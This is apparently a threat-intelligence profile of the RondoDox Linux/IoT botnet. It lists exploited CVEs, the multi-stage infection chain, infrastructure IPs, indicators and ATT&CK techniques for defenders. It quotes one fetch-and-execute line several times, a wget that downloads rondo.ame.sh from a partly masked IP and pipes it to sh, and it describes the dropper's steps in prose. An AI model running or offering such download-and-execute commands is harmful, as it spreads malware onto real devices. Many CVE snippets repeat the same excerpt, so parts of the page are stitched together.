RondoDox
RondoDox is a Linux-based botnet first identified in mid-2025 and commonly described as a Mirai variant or Mirai-like malware. Multiple reports characterize it as focused primarily on denial-of-service activity, with support for HTTP, UDP, and TCP DDoS attacks, while later reporting also states it evolved to drop and launch XMRig cryptocurrency mining payloads on infected systems. It primarily targets IoT devices, consumer edge devices, routers, DVRs, web servers, and other internet-exposed Linux systems, especially unsupported or end-of-life devices.
RondoDox has been observed using broad, multi-stage mass exploitation to compromise targets. Reporting attributes 174 exploited vulnerabilities to the botnet between May 25, 2025 and February 16, 2026, with peaks of up to 15,000 exploitation attempts per day and more than 40,000 automated attacks in one January 2026 campaign. It has been linked to exploitation of numerous flaws including CVE-2017-9841 (PHPUnit), CVE-2018-5999 (ASUS routers), CVE-2024-3721 (TBK DVRs), CVE-2023-1389, CVE-2025-37164, HPE OneView RCE, and React2Shell/CVE-2025-55182. Researchers reported active and persistent scanning for vulnerable Next.js servers, exploitation of TBK DVRs and Four-Faith routers, and campaigns against government, financial, and industrial systems.
The malware distribution chain described in reporting uses first-stage shell scripts named in the pattern rondo.XXX.sh and second-stage binaries named rondo for multiple CPU architectures. The first-stage script redirects output to /dev/null, kills suspicious or competing processes, attempts to disable SELinux and AppArmor, remounts the root filesystem read-write, deletes cache files, creates temporary marker files named .t in writable directories, removes prior malware files from locations such as /dev, /dev/shm, /run, /tmp, /var/run, and /var/tmp, then downloads and executes an architecture-specific binary using wget, curl, or busybox. The malware has been reported to support 18 architectures. Main binaries perform sanity, anti-debugging, and anti-analysis checks, establish persistence, remove competing malware, and connect to hard-coded command-and-control servers.
Infrastructure analysis indicates segmented exploitation, hosting, and C2 infrastructure. Bitsight identified 32 RondoDox-related IPs, split between exploitation and hosting nodes, and assessed that many hosting nodes were likely compromised residential systems. Reporting also linked Iranian-hosted infrastructure to RondoDox activity, including AbrArvan CDN-hosted exploitation infrastructure, and Hunt.io associated Iranian infrastructure with daily exploit volumes peaking at 15,000 attempts. Separate reporting noted use of compromised residential IPs and blacklisting logic on hosting servers to hinder analysis.
RondoDox has been associated in reporting with a recurring email indicator, bang2012@tutanota.de, embedded in observed first-stage shell scripts. Another report on ShellShock-linked distribution activity observed payloads fetching rondo.ame.sh from 74.194.191.52 and noted the marker rondo2012@atomicmail.io. Additional infrastructure indicators directly mentioned in the reporting include 37.32.15.8 as RondoDox exploitation infrastructure active since May 2025, and distribution IPs 83.252.42.112, 38.59.219.27, 192.183.232.142, and 74.194.191.52.
Overall, the reporting portrays RondoDox as a rapidly evolving, exploit-heavy IoT/Linux botnet that weaponizes a large set of known vulnerabilities to conscript exposed devices into a botnet used mainly for DoS operations, with later integration of XMRig mining functionality.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
32 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The campaign, attributed to the emerging RondoDox botnet, targets CVE-2025-37164, a critical remote code execution (RCE) flaw that allows unauthenticated attackers to seize control of the system. The vulnerability lies deep within the executeCommand REST API endpoint of HPE OneView’s “id-pools” functionality. | The campaign, attributed to the emerging RondoDox botnet, targets CVE-2025-37164, a critical remote code execution (RCE) flaw... The perpetrator behind this blitz is RondoDox, a Linux-based botnet first identified in mid-2025. Known for targeting IoT devices and web servers for DDoS attacks and cryptocurrency mining...
The RondoDox botnet has been exploiting this vulnerability since May 17, as discovered by VulnCheck's Canary Network. RondoDox, known for employing numerous exploits, primarily targets Linux-based systems for denial of service attacks. | Cybercriminals are actively exploiting a critical software vulnerability from 2018, CVE-2018-5999, to target older models of ASUS routers. This unauthenticated configuration update vulnerability, with a CVSS score of 9.8/10, allows attackers to alter router settings without requiring a password. The RondoDox botnet has been exploiting this vulnerability since May 17.
CVE-2023-1389: A critical command injection vulnerability in the web management interface of TP-Link Archer AX21 routers allows unauthenticated attackers to execute arbitrary commands as the root user. | This month, we are looking into a relatively new threat actor who is attempting to distribute the RondoDox malware... Since July 15th of this year, we’ve been seeing scans from what appears to be a specific threat actor attempting to distribute the recently discovered “rondo” malware... This malware is a variation on Mirai.
This month, we are looking into a relatively new threat actor who is attempting to distribute the RondoDox malware... Since July 15th of this year, we’ve been seeing scans from what appears to be a specific threat actor attempting to distribute the recently discovered “rondo” malware... This malware is a variation on Mirai. | CVE-2024-3721: A critical command injection vulnerability in certain TBK DVR models allows an unauthenticated remote attacker to execute arbitrary commands via crafted HTTP requests.
This month, we are looking into a relatively new threat actor who is attempting to distribute the RondoDox malware... Since July 15th of this year, we’ve been seeing scans from what appears to be a specific threat actor attempting to distribute the recently discovered “rondo” malware... This malware is a variation on Mirai. | CVE-2025-4008: A command injection vulnerability in the web interface of Meteobridge allows a remote, unauthenticated attacker to execute arbitrary commands with root privileges.
CVE-2022-40619: A firewall authentication bypass vulnerability affects FortiGate, FortiProxy, and FortiSwitchManager, allowing an attacker to perform operations on the administrative interface. | This month, we are looking into a relatively new threat actor who is attempting to distribute the RondoDox malware... Since July 15th of this year, we’ve been seeing scans from what appears to be a specific threat actor attempting to distribute the recently discovered “rondo” malware... This malware is a variation on Mirai.
This month, we are looking into a relatively new threat actor who is attempting to distribute the RondoDox malware... Since July 15th of this year, we’ve been seeing scans from what appears to be a specific threat actor attempting to distribute the recently discovered “rondo” malware... This malware is a variation on Mirai. | CVE-2020-9054: A command injection vulnerability in the weblogin.cgi component of multiple Zyxel NAS products allows an unauthenticated remote attacker to execute arbitrary OS commands.
CVE-2025-34043: A remote command injection vulnerability in Vacron Network Video Recorder (NVR) devices allows unauthenticated attackers to execute arbitrary commands on the operating system. | This month, we are looking into a relatively new threat actor who is attempting to distribute the RondoDox malware... Since July 15th of this year, we’ve been seeing scans from what appears to be a specific threat actor attempting to distribute the recently discovered “rondo” malware... This malware is a variation on Mirai.
This month, we are looking into a relatively new threat actor who is attempting to distribute the RondoDox malware... Since July 15th of this year, we’ve been seeing scans from what appears to be a specific threat actor attempting to distribute the recently discovered “rondo” malware... This malware is a variation on Mirai. | CVE-2023-41011: A command execution vulnerability in the shortcut_telnet.cg component of the China Mobile Intelligent Home Gateway v.HG6543C4 allows a remote attacker to execute arbitrary code.
CVE-2022-36553: A command injection vulnerability in the popen.cgi component of Hytec Inter HWL-2511-SS devices allows an authenticated attacker to execute arbitrary commands. | This month, we are looking into a relatively new threat actor who is attempting to distribute the RondoDox malware... Since July 15th of this year, we’ve been seeing scans from what appears to be a specific threat actor attempting to distribute the recently discovered “rondo” malware... This malware is a variation on Mirai.
CVE-2014-3206: Seagate BlackArmor NAS products are vulnerable to remote command execution via the session and auth_name parameters in certain web endpoints. | This month, we are looking into a relatively new threat actor who is attempting to distribute the RondoDox malware... Since July 15th of this year, we’ve been seeing scans from what appears to be a specific threat actor attempting to distribute the recently discovered “rondo” malware... This malware is a variation on Mirai.
This month, we are looking into a relatively new threat actor who is attempting to distribute the RondoDox malware... Since July 15th of this year, we’ve been seeing scans from what appears to be a specific threat actor attempting to distribute the recently discovered “rondo” malware... This malware is a variation on Mirai. | CVE-2023-23333: A command injection vulnerability in downloader.php within SolarView Compact devices allows an unauthenticated remote attacker to execute arbitrary commands.
This month, we are looking into a relatively new threat actor who is attempting to distribute the RondoDox malware... Since July 15th of this year, we’ve been seeing scans from what appears to be a specific threat actor attempting to distribute the recently discovered “rondo” malware... This malware is a variation on Mirai. | CVE-2025-9528: A vulnerability in the Linksys E1700 router's systemCommand function allows an authenticated remote attacker to perform OS command injection.
This month, we are looking into a relatively new threat actor who is attempting to distribute the RondoDox malware... Since July 15th of this year, we’ve been seeing scans from what appears to be a specific threat actor attempting to distribute the recently discovered “rondo” malware... This malware is a variation on Mirai. | CVE-2020-10987: The setUsbUnload endpoint in Tenda AC15 and AC1900 routers contains a command injection vulnerability that allows an unauthenticated remote attacker to execute arbitrary system commands.
CVE-2013-1599: A command injection vulnerability in the rtpd.cgi component of D-Link IP Cameras allows an unauthenticated remote attacker to execute arbitrary commands via a crafted query string. | This month, we are looking into a relatively new threat actor who is attempting to distribute the RondoDox malware... Since July 15th of this year, we’ve been seeing scans from what appears to be a specific threat actor attempting to distribute the recently discovered “rondo” malware... This malware is a variation on Mirai.
CVE-2024-10914: An unauthenticated remote command injection vulnerability in legacy D-Link NAS devices, particularly in the account_mgr.cgi script, allows an attacker to execute arbitrary shell commands. | This month, we are looking into a relatively new threat actor who is attempting to distribute the RondoDox malware... Since July 15th of this year, we’ve been seeing scans from what appears to be a specific threat actor attempting to distribute the recently discovered “rondo” malware... This malware is a variation on Mirai.
VulnCheck's exploit intelligence data shows CVE-2017-9841 has been leveraged by several botnets including RondoDox, Kinsing, KashmirBlack, Sysrv and Androxgh0st.
One threat that has been making noise recently due to its large repertoire of exploits is the RondoDox botnet. We initially observed this threat in May 2025... The main differentiator between RondoDox and Mirai is that, unlike Mirai, this malware’s sole purpose is to execute DoS attacks... At this point it will also set up its own persistence and drop and launch the XMRig miner. | By looking at some recent CVEs from 2025 we created the following table, showing the time between the vulnerability being disclosed and when it was added by the operators. CVE-2025-52089 2025-07-11 2025-10-19
By looking at some recent CVEs from 2025 we created the following table, showing the time between the vulnerability being disclosed and when it was added by the operators. CVE-2025-32756 2025-05-13 2025-10-18 | One threat that has been making noise recently due to its large repertoire of exploits is the RondoDox botnet. We initially observed this threat in May 2025... The main differentiator between RondoDox and Mirai is that, unlike Mirai, this malware’s sole purpose is to execute DoS attacks... At this point it will also set up its own persistence and drop and launch the XMRig miner.
One threat that has been making noise recently due to its large repertoire of exploits is the RondoDox botnet. We initially observed this threat in May 2025... The main differentiator between RondoDox and Mirai is that, unlike Mirai, this malware’s sole purpose is to execute DoS attacks... At this point it will also set up its own persistence and drop and launch the XMRig miner. | By looking at some recent CVEs from 2025 we created the following table, showing the time between the vulnerability being disclosed and when it was added by the operators. CVE-2025-20281 2025-06-25 2025-10-18
One threat that has been making noise recently due to its large repertoire of exploits is the RondoDox botnet. We initially observed this threat in May 2025... The main differentiator between RondoDox and Mirai is that, unlike Mirai, this malware’s sole purpose is to execute DoS attacks... At this point it will also set up its own persistence and drop and launch the XMRig miner. | Other examples of issues with exploits are in CVE-2025-47812 and CVE-2025-62593. In the first CVE, if we read the description by RCE Security we can see that in order to fully trigger the exploit it requires 2 requests: an initial POST with the payload, followed by a POST to trigger the exploit. In our honeypots we only see the first POST and not the second.
By looking at some recent CVEs from 2025 we created the following table, showing the time between the vulnerability being disclosed and when it was added by the operators. CVE-2025-24016 2025-02-10 2025-08-22 | One threat that has been making noise recently due to its large repertoire of exploits is the RondoDox botnet. We initially observed this threat in May 2025... The main differentiator between RondoDox and Mirai is that, unlike Mirai, this malware’s sole purpose is to execute DoS attacks... At this point it will also set up its own persistence and drop and launch the XMRig miner.
By looking at some recent CVEs from 2025 we created the following table, showing the time between the vulnerability being disclosed and when it was added by the operators. CVE-2025-57296 2025-09-19 2025-10-19 | One threat that has been making noise recently due to its large repertoire of exploits is the RondoDox botnet. We initially observed this threat in May 2025... The main differentiator between RondoDox and Mirai is that, unlike Mirai, this malware’s sole purpose is to execute DoS attacks... At this point it will also set up its own persistence and drop and launch the XMRig miner.
One threat that has been making noise recently due to its large repertoire of exploits is the RondoDox botnet. We initially observed this threat in May 2025... The main differentiator between RondoDox and Mirai is that, unlike Mirai, this malware’s sole purpose is to execute DoS attacks... At this point it will also set up its own persistence and drop and launch the XMRig miner. | By looking at some recent CVEs from 2025 we created the following table, showing the time between the vulnerability being disclosed and when it was added by the operators. CVE-2025-48827 2025-05-27 2025-11-03
The most radical change in our observations is in early January 2026, where we went from around 40 observed vulnerabilities down to only two. One of these vulnerabilities is CVE-2025-55182, aka React2Shell, which was disclosed on December 3, 2025 and added by the threat actors on December 6, 2025. | One threat that has been making noise recently due to its large repertoire of exploits is the RondoDox botnet. We initially observed this threat in May 2025... The main differentiator between RondoDox and Mirai is that, unlike Mirai, this malware’s sole purpose is to execute DoS attacks... At this point it will also set up its own persistence and drop and launch the XMRig miner.
One threat that has been making noise recently due to its large repertoire of exploits is the RondoDox botnet. We initially observed this threat in May 2025... The main differentiator between RondoDox and Mirai is that, unlike Mirai, this malware’s sole purpose is to execute DoS attacks... At this point it will also set up its own persistence and drop and launch the XMRig miner. | CVE-2025-62593 2025-11-26 2025-11-24 ... This was exploited before the CVE was published, and this is justified because the PoC for the vulnerability was available before the published date... For CVE-2025-62593 there’s a similar issue in the implemented exploit. The advisory mentions that the authentication to critical endpoints is made by checking the User-Agent string for “Mozilla", which if present will return an HTTP code 405. The exploit used by RondoDox specifically sets the User-Agent to “Mozilla/5.0 (rondo2012@atomicmail[.]io)” which will render the exploit ineffective.
The most radical change in our observations is in early January 2026, where we went from around 40 observed vulnerabilities down to only two. One of these vulnerabilities is CVE-2023-46604. | One threat that has been making noise recently due to its large repertoire of exploits is the RondoDox botnet. We initially observed this threat in May 2025... The main differentiator between RondoDox and Mirai is that, unlike Mirai, this malware’s sole purpose is to execute DoS attacks... At this point it will also set up its own persistence and drop and launch the XMRig miner.
One threat that has been making noise recently due to its large repertoire of exploits is the RondoDox botnet. We initially observed this threat in May 2025... The main differentiator between RondoDox and Mirai is that, unlike Mirai, this malware’s sole purpose is to execute DoS attacks... At this point it will also set up its own persistence and drop and launch the XMRig miner. | By looking at some recent CVEs from 2025 we created the following table, showing the time between the vulnerability being disclosed and when it was added by the operators. CVE-2025-24893 2025-02-20 2025-11-03
...and CVE-2024-12856, an operating system (OS) command injection bug affecting Four-Faith router models F3x24 and F3x36.
"Most of November’s volume tracked to a single cluster we associate with RondoDox distribution. 76% of attempts (737 out of 969) matched the same delivery pattern... with payloads that fetch and execute a first-stage script... ( wget -qO- http://74.###.###.52/rondo.ame.sh ... ) | sh"
CVE-2014-6271, commonly known as the Shellshock vulnerability, remains one of the most notorious flaws in Unix-based systems. This vulnerability affects the Bash shell and allows attackers to execute arbitrary commands by injecting malicious code into environment variables.
"Most of November’s volume tracked to a single cluster we associate with RondoDox distribution. 76% of attempts (737 out of 969) matched the same delivery pattern... with payloads that fetch and execute a first-stage script... ( wget -qO- http://74.###.###.52/rondo.ame.sh ... ) | sh"
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"Most of November’s volume tracked to a single cluster we associate with RondoDox distribution. 76% of attempts (737 out of 969) matched the same delivery pattern... with payloads that fetch and execute a first-stage script... ( wget -qO- http://74.###.###.52/rondo.ame.sh ... ) | sh"
Techniques & procedures
24 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance
1 technique
Reconnaissance
Resource Development
1 technique
Resource Development
Initial Access
1 technique
Initial Access
The vulnerability lies deep within the executeCommand REST API endpoint of HPE OneView’s “id-pools” functionality. According to the report, this endpoint “accepts attacker supplied input without authentication or authorization checks and executes it directly via the underlying operating system runtime”.
Execution
4 techniques
Execution
At this point it will also set up its own persistence and drop and launch the XMRig miner
By sending a single malicious request, they can bypass security checks entirely and run arbitrary code on the server.
Persistence
3 techniques
Persistence
Privilege Escalation
3 techniques
Privilege Escalation
Stealth
7 techniques
Stealth
"RondoDox malware encodes its configuration data using a simple XOR obfuscation algorithm... decrypted using the hexadecimal key 0x21"
"disguises malicious traffic by emulating popular games... as well as tools like Discord, OpenVPN, WireGuard"
It then attempts to remove other threats, both by checking specific file locations and by removing entries from the victim's crontabs.
"and clears the command execution history to evade detection"
Upon being launched, the main binary does some basic sanity checks for its name and arguments, as well as checks for anti-debug and anti-analysis.
Defense Impairment
1 technique
Defense Impairment
Discovery
2 techniques
Discovery
Command and Control
3 techniques
Command and Control
Impact
3 techniques
Impact
IOCs tracked for this family
104 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
73 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A botnet that exploits vulnerabilities in internet-facing devices, particularly Linux-based systems and older ASUS routers, to conduct denial-of-service attacks.
A Mirai-like botnet hosted on Iranian infrastructure that conducted large-scale exploitation attempts against internet-exposed devices.
Botnet activity hosted on Iranian infrastructure was linked to this malware.
Linux-focused botnet that mass-exploits exposed and often end-of-life IoT and consumer router devices, then deploys a payload that connects to command-and-control infrastructure. Its stated purpose in the content is to execute DoS attacks.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.